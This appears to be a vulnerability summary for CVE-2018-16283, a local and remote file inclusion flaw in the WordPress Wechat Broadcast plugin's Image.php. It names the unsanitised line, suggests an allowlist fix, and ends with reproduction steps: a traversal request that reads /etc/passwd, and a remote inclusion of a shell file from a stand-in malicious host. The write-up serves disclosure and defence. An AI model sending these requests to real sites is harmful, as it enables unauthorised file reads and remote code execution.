CVE-2018-16283

An unauthenticated attacker sends a GET request to `/wp-content/plugins/wechat-broadcast/wechat/Image.php` with a `url` parameter containing path traversal sequences (e.g., `../../../../etc/passwd`) or a remote URL. The vulnerable code `file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '')` passes the unsanitized parameter directly to `file_get_contents()`, enabling local file inclusion (LFI) or remote file inclusion (RFI) [ref_id=1]. The attacker only needs HTTP/1.0 protocol access to the WordPress site [ref_id=1].

The vulnerable file is `/wechat-broadcast/wechat/Image.php` [ref_id=1]. The offending line is `echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');` which passes the unsanitized `url` parameter directly to `file_get_contents()` [ref_id=1].

No patch is published in the bundle. The advisory [ref_id=1] identifies the root cause as the unsanitized `$_GET["url"]` parameter passed directly to `file_get_contents()`. The remediation would require validating the `url` parameter against an allowlist of permitted paths or domains, or removing the raw user-controlled file read entirely.

1. Ensure the Wechat Broadcast plugin 1.2.0 or earlier is installed on a WordPress site. 2. Send a GET request to `/wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd` to read local files. 3. Alternatively, use a remote URL such as `http://malicious.url/shell.txt` for remote file inclusion [ref_id=1].